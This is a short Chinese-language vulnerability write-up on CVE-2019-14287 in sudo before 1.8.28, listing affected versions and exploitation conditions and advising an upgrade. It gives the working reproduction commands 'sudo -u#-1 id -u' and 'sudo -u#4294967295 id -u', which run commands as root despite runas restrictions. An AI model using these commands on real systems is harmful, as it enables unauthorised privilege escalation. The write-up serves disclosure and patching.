前言
sudo 是所有 unix操作系统(BSD, MacOS, GNU/Linux) 基本集成的一个用户权限控制/切换程序。允许管理员控制服务器下用户能够切换的用户权限
CVE-2019-14287 是管理员在配置文件中用了 ALL 关键词后造成的。
影响版本
sudo < 1.8.28
利用条件
1、sudo -v < 1.8.28
2、知道当前用户的密码
3、当前用户存在于sudo权限列表
我们来看一下/etc/sudoers
漏洞复现
sudo -u#-1 id -u
or
sudo -u#4294967295 id -u
修复建议
升级sudo到最新版